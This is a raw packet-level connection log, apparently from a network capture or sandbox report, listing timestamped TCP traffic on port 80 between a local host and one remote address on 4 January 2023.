Jan 4, 2023 16:47:25.472162962 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.472173929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.472193003 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.472212076 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.472234011 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.472253084 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.472273111 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.472296000 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.472313881 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.472337961 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.472354889 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.472378969 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.472403049 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.472419977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.472435951 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.472460032 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.472481966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.472500086 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.472522020 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.472539902 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.472563982 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.472580910 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.472595930 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.472620964 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.472645044 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.472661972 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.472696066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.472717047 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.480920076 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.480983019 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481029034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481081009 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481127024 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481173992 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481203079 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.481203079 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.481223106 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481272936 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481293917 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.481293917 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.481321096 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481369019 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481396914 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.481415987 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481441021 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.481465101 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481492043 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.481512070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481533051 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.481560946 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481585026 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.481607914 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481640100 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.481653929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481672049 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.481702089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481724977 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.481751919 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481782913 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.481798887 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481806993 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.481847048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481868029 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.481894016 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481940985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.481955051 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.481988907 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482007027 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482037067 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482045889 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482088089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482136011 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482144117 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482144117 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482182026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482209921 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482229948 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482254028 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482276917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482304096 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482330084 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482346058 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482378006 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482403040 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482424974 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482443094 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482472897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482494116 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482521057 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482557058 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482568026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482583046 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482620955 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482636929 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482666969 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482711077 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482734919 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482743979 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482786894 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482831001 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482836008 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482861996 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482883930 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482904911 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482933044 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482980013 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.482985020 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.482985020 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.483026981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483076096 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483084917 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.483123064 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483144045 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.483171940 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483194113 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.483220100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483227015 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.483309031 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483328104 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.483356953 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483371019 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.483406067 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483426094 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.483453035 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483477116 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.483500004 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483520031 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.483547926 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483552933 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.483596087 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483616114 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.483644962 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483664989 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.483692884 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483714104 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.483741045 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483773947 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.483789921 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483804941 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.483838081 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483885050 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483886957 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.483932018 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483968019 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.483968019 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.483979940 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.483997107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484029055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484040976 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484076977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484101057 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484123945 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484138966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484173059 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484199047 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484224081 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484236956 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484272957 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484297037 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484319925 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484334946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484366894 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484385967 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484414101 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484436989 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484462976 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484476089 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484510899 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484528065 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484560013 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484589100 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484606981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484622955 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484654903 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484675884 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484702110 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484729052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484747887 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484755993 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484796047 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484821081 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484843016 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484873056 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484895945 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484915018 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484931946 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484965086 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.484972954 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.484999895 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.485003948 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.485029936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.485035896 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.485059023 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.485074997 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.485112906 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.485121012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.485143900 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.485157013 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.485183001 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.485193968 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.485215902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.485229969 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.485255957 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.485264063 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.485331059 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.485366106 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.485380888 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.485380888 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.485389948 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.485421896 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.485424995 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.485460997 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.485462904 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.485481977 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.488456964 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.498840094 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.498893023 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.498928070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.498960018 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.498960972 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.498991966 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.499025106 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.499031067 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.499062061 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.499073982 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.499094009 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.499097109 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.499131918 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.499135971 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.499154091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.499164104 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.499196053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.499222040 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.499228001 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.499258995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.499259949 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.499293089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.499304056 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.499325037 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.499325991 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.499347925 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.499357939 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.499391079 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.499413967 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.499423981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.499449015 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.499485016 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.511540890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.511605978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.511651039 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.511694908 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.511739969 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.511769056 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.511782885 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.511826992 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.511828899 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.511872053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.511876106 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.511897087 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.511915922 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.511934042 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.511964083 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.511979103 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512007952 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512022972 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512058973 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512065887 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512103081 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512118101 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512147903 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512161016 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512191057 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512206078 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512234926 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512248039 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512280941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512298107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512324095 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512345076 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512368917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512382030 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512414932 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512429953 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512456894 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512473106 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512501955 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512516975 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512572050 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512613058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512638092 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512644053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512676001 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512715101 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512721062 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512758017 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512768030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512795925 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512824059 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512837887 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512868881 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512882948 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512912989 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512924910 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.512957096 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.512969017 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513000965 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513029099 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513044119 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513070107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513089895 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513108015 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513133049 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513154984 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513178110 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513221025 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513240099 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513264894 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513266087 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513309956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513319969 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513341904 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513355017 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513398886 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513398886 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513442993 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513444901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513469934 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513485909 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513506889 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513530970 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513540983 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513576031 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513618946 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513627052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513662100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513668060 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513689041 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513706923 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513741016 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513747931 CET	80	49695	109.107.173.210	192.168.2.4
